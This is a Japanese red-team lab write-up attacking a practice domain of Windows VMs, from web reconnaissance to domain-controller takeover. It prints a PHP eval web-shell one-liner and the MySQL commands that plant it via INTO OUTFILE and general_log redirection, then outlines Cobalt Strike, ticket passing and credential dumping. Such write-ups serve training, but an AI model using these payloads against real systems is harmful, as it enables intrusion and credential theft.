ATT&CK 実践シリーズ - レッドチーム評価(1)ターゲットノート#
概要:
仮想マシンのパスワード
hongrisec@2019 ログイン後、再設定が必要です
win7
192.168.0.1/24 ブリッジ接続
192.168.52.0/24 インターネット
win2003
192.168.52.0/24 インターネット
win2008
192.168.52.0/24 インターネット
ターゲットデプロイメント
まず、win2008 DC ホストを起動します。
次に、win2003 を起動します。
最後に、win7 を起動します。
win7 ホストの C ドライブで phpstudy を起動します(ソフトウェアが破損して起動できないため、別途インストールして WWW 内の phpmyadmin 以外のファイルを移行してください)。
本文#
まず、外部サーバーをスキャンして、ポート 80 を確認します。
ディレクトリをスキャンして、ディレクトリをリストアップできることがわかりました。(おそらく新しい phpstudy のインストールによるものです)感度の高いファイル beifen.rar と phpmyadmin ログインが存在することがわかりました。
感度の高いファイルをダウンロードして解凍すると、ソースコードが見つかりました。ソースコードのフォルダを組み合わせて URL を作成すると、欠損した cms が見つかりましたが、詳しく調査しても何もありませんでした。
ソースコードを見ると、データベースのパスワードが見つかりました。
データベースの root アカウントのパスワードを取得しましたので、ちょうど phpmyadmin にログインできます。
まず、ワンライナーを書きます。パスは探針から取得できます
select "<?php @eval($_POST[a]);?>" into outfile (“C:/WWW/11.php”);
失敗しました、制限があります
ログを使用してみましょう
set global general_log='on'; #ログ機能をオンにする
set global general_log_file=’D:/WWW/xxx.php’; #ログの保存先を設定する
最後に、クエリを再度実行して、クエリの内容を書き込みます
select ‘<?php @eval($_POST[a]);?>’;
そして、ウェブシェルを使用して接続します(最初は蚁剣を使用しましたが、接続できませんでした、原因は不明です。)
バックアップのために冰蝎も書いておきます、冰蝎で権限を確認します
冰蝎で msf シェルを起動します
msf でシェルに切り替えることができず、常に異常終了してしまいます。アンチウイルスソフトウェアまたはファイアウォールの問題と推測されます
古い方法に切り替えて、webshell を使用してマルウェアを転送し、仮想端末が cs にオンラインできるようにします
最初に自分自身にいくつかの分身を作成しておきます。セッションが切れるのを防ぐためです
それ以降はあまり言うことはありません。このターゲットマシンはいろいろなことができると思っていましたが、マシンを手に入れると管理者権限しかありませんでした。残りの 2 つのホストはサービスがクラッシュしてしまいました。やはり古い方法を使用し、まずは win2003 を攻略し、その後 win2008 をドメインを利用して攻略する必要があります。ここではチケットを 2003 に転送し、パスワードを読み取り、ドメイン管理者アカウントを取得し、それを 2008 に転送します。ネットワークトポロジー図に従って、SMB ビーコンを使用する必要があります。攻撃セッションにはネットワークセグメントに注意してください。